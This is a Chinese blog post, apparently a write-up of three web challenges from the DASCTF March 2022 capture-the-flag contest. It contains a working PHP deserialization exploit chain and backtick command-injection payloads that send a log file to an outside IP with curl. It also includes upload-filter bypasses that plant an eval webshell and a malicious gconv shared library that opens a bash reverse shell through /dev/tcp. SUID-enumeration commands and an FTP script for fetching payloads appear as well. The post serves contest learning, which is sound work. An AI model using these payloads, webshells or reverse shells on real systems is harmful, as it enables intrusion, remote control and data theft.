Y0ng的博客
0%

2022DASCTFXSU三月

发表于 分类于

前言

最近状态好差

ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

链子

fin::destruct -> what::toString -> mix::run -> crow::invoke -> fin::call -> mix::get_flag

exp

<?php
class crow
{
    public $v1;
}
class fin
{
    public $f1;

}
class what
{
    public $a;

}
class mix
{
    public $m1;
}
$fin1 = new fin();
$fin2 = new fin();
$crow = new crow();
$what = new what();
$mix = new mix();
$mix2 = new mix();

$fin1->f1 = $what;
$what->a = $mix;
$mix->m1 = $crow;
$crow->v1 = $fin2;
$fin2->f1 = $mix2;
$mix2->m1 = "?><?php phpinfo();?>";

echo serialize($fin1);

calc

info: hack the calc

说起这道题,比赛完我直接人麻了,意料之外,不蛋bi了…

逻辑很简单,就是接受字符串做 eval 计算,然后log中只有num部分可控,接着执行了系统命令

当然eval肯定是做了过滤了,漏了反引号

image-20220328191540666

那就构造 1+1#`ls` 反弹shell 或者curl外带数据

image-20220328191818596

?num=1+1#`ls`
?num=1%2B1%23%60curl%09http://1.116.110.61:4000%09-F%09xx=@./tmp/log.txt%60
?num=1%2B1%23%60cat%09/Th*%60
?num=1%2B1%23%60curl%09http://1.116.110.61:4000%09-F%09xx=@./tmp/log.txt%60

image-20220328193046046

upgdstore

info: Can you upload me?

直接上传 <?php phpinfo();?> 可以并且回显文件地址,php8.0.1

disable_function很离谱,究极究极究极多,看来需要bypass,putenv,mail没有被ban

image-20220328193653166

现在就是尝试能不能getshell,show_source没有被ban,上传的时候一直被检测

image-20220328194333344

尝试读文件:

利用php函数大小写不敏感绕过 <?php Show_source('../index.php');?>

动态绕过 <?php base64_decode('c2hvd19zb3VyY2U=')('../index.php');?>

<?php echo ('fil'.'e_get_contents')('/var/www/html/index.php');

在PHP中,函数名、方法名、类名、关键字不区分大小写;但变量名、常量名区分大小写。

读取到 index.php

<?php
function fun($var): bool{
    $blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];

    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }
    return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");
}

$content = file_get_contents($temp_file);
if(fun($content)){
    die("诶,被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;


        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
            die();
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

就想办法拿shell,学习到两种方法

一、利用 include+php伪协议

上传一句话木马为1.php
PD9waHAgZXZhbCgkX1BPU1RbImEiXSk7Pz4=
伪协议包含
<?php Include(base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT1mM2I5NGU4OGJkMWJkMzI1YWY2ZjYyODI4Yzg3ODVkZC5waHA="));?>

image-20220330104500440

二、内置类SplFileObject::fwrite 写文件

由于过滤了 $,我们无法使用变量,过滤了 - 我们无法调用类的动态方法

由于绝大部分写文件函数都被禁止了,我们考虑使用内置类 SplFileObject::fwrite 进行写文件,写一句话木马

利用继承,重写一个类,把动态方法调用变成静态方法

(学到了学到了)

<?php
define("EV", "eva"."l");
define("GETCONT", "fil"."e_get_contents");
// 由于禁止了$,我们只能从已有的地方获取$符
define("D",(GETCONT)('/var/www/html/index.php')[353]);
define("SHELL","<?php ".EV."(".D."_POST['a']);");
echo (GETCONT)('./shell.php');

class splf extends SplFileObject {

    public function __destruct() {
        parent::fwrite(SHELL);
    }
}
define("PHARA", new splf('shell.php','w'));

image-20220330105929018

开始bypass disable,利用shell.php

payload.c

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  puts("pwned");
  system("bash -c 'bash -i >& /dev/tcp/1.116.110.61/3000 0>&1'");
  exit(0);
}

生成so文件

gcc payload.c -o payload.so -shared -fPIC

gconv-modules

module  PAYLOAD//    INTERNAL    ../../../../../../../../tmp/payload    2
module  INTERNAL    PAYLOAD//    ../../../../../../../../tmp/payload    2

SplFileObjectpayload.sogconv-modules

$url = "http://150.158.181.145:8000/payload.so";
//$url = "http://150.158.181.145:8000/gconv-modules";

$file1 = new SplFileObject($url,'r');
$a="";
while(!$file1->eof())
{
    $a=$a.$file1->fgets();
}
$file2 = new SplFileObject('/tmp/payload.so','w');
//$file2 = new SplFileObject('/tmp/gconv-modules','w');
$file2->fwrite($a);

image-20220330111625947

触发

putenv("GCONV_PATH=/tmp/");show_source("php://filter/read=convert.iconv.payload.utf-8/resource=/tmp/payload.so");

没有权限读取flag

image-20220330113009866

尝试suid提权

find / -user root -perm -4000 -print 2>/dev/null
find /bin -perm -u=s -type f 2>/dev/null
find /usr -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

补充

还有利用 ftp 进行写操作

python开启ftp服务

from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer


authorizer = DummyAuthorizer()

authorizer.add_anonymous("./")

handler = FTPHandler
handler.authorizer = authorizer

handler.masquerade_address = "ip"
# 注意要用被动模式
handler.passive_ports = range(9998,10000)

server = FTPServer(("0.0.0.0", 23), handler)
server.serve_forever()

php下载

$local_file = '/tmp/hack1.so';
$server_file = 'hack.so';
$ftp_server = 'xxxxx';
$ftp_port=21;

$ftp = ftp_connect($ftp_server,$ftp_port);


$login_result = ftp_login($ftp, 'anonymous', '');
// 注意要开启被动模式
ftp_pasv($ftp,1);

if (ftp_get($ftp, $local_file, $server_file, FTP_BINARY)) {
    echo "Successfully written to $local_file\n";
} else {
    echo "There was a problem\n";
}

ftp_close($ftp);

参考

2022DASCTF三月月赛-WriteUp | Site-01 (rayi.vip)

(●´3`●)やれやれだぜ (erroratao.github.io)